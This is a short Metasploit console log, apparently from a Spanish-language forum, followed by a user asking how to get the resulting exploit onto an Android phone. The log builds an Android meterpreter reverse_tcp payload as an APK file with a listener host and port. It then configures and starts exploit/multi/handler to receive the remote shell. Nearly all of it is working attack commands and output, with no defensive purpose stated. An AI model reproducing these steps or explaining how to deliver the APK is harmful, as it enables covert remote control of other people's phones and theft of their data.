msfconsole msf > msfpayload android/meterpreter/reverse_tcp LHOST=192.xxx.xxx.xxx LPORT=4445 R > /root/Desktop/prueba.apk
msf > use exploit/multi/handlermsf exploit(handler) > set payload android/meterpreter/reverse_tcppayload => android/meterpreter/reverse_tcpmsf exploit(handler) > set lhost 192.xxx.xxx.xxxlhost => 192.xxx.xxx.xxxmsf exploit(handler) > set lport 4445lport => 4445msf exploit(handler) > exploit[*] Started reverse handler on 192.xxx.xxx.xxx:4445[*] Starting the payload handler...
como haces para meterle el exploit creas una apk con msf y la descargas en el android o como?